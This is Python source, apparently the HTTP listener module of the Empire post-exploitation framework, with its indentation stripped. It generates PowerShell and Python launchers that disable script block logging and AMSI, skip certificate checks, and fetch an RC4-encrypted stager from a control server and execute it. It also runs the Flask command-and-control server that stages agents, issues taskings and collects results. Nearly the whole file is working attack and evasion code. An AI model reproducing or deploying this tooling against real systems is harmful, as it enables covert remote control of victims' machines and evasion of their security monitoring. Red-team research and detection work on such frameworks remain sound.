stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($"+helpers.generate_random_script_var_name("GPF")+"){$"+helpers.generate_random_script_var_name("GPC")+"=$"+helpers.generate_random_script_var_name("GPF")+".GetValue($null);If($"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$val.Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("GPC")+"")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$val}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.Ams'+'iUtils'"
stager += helpers.randomize_capitalization(');$Ref.GetField(')
stager += "'am'+'siInitFailed','NonPu'+'blic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+"=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$'+helpers.generate_random_script_var_name("wc")+'.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"','"+domain+"');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('"+usr+"','"+password+"');"
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Proxy.Credentials = $netcred;")
#save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $"+helpers.generate_random_script_var_name("wc")+".Proxy;"
# TODO: reimplement stager retries?
#check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
stager += "$ser="+helpers.obfuscate_call_home_address(host)+";$t='"+stage0+"';"
#Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#If host header defined, assume domain fronting is in use and add a call to the base URL first
#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization("try{$ig=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization("$"+helpers.generate_random_script_var_name("wc")+".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket)
stager += helpers.randomize_capitalization("$data=$"+helpers.generate_random_script_var_name("wc")+".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print helpers.color(p, color='red')
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib2;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
launcherBase += "req=urllib2.Request(server+t);\n"
# add the RC4 packet to a cookie
launcherBase += "req.add_header('User-Agent',UA);\n"
launcherBase += "req.add_header('Cookie',\"%s=%s\");\n" % (cookie,b64RoutingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
#launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib2.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib2.ProxyHandler({'"+proto+"':'"+proxy+"'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "proxy_auth_handler = urllib2.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"');\n"
launcherBase += "o = urllib2.build_opener(proxy, proxy_auth_handler);\n"
else:
launcherBase += "o = urllib2.build_opener(proxy);\n"
else:
launcherBase += "o = urllib2.build_opener();\n"
#install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib2.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib2.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s';" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=range(256),0,[]\n"
launcherBase += "for i in range(256):\n"
launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase)
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | /usr/bin/python &" % (launchEncoded)
return launcher
else:
return launcherBase
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!")
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_stager(): no language specified!')
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
#Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
#headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";","$customHeaders = \""+headers+"\";")
#patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
#Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, randomizedStager)
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV+stagingKey, stager)
else:
# otherwise return the standard stager
return stager
else:
print helpers.color("[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_agent(): no language specified!')
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response())
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace('$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', "$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "'+str(b64DefaultResponse)+'"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace('profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")', 'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print helpers.color("[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add("Cookie",\"""" + self.session_cookie + """=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $"""+helpers.generate_random_script_var_name("wc")+""".DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$"""+helpers.generate_random_script_var_name("wc")+""" = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$"""+helpers.generate_random_script_var_name("wc")+""".Proxy = $Script:Proxy;
}
$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$"""+helpers.generate_random_script_var_name("wc")+""".Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $"""+helpers.generate_random_script_var_name("wc")+""".UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets)
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket)
headers['Cookie'] = \"""" + self.session_cookie + """=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print helpers.color("[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module.")
else:
print helpers.color('[!] listeners/http generate_comms(): no language specified!')
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.route('/')
@app.route('/index.html')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/welcome.png')
def serve_index_helper():
"""
Serves image loaded by index page.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=')+1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results == 'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
pyversion = sys.version_info
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
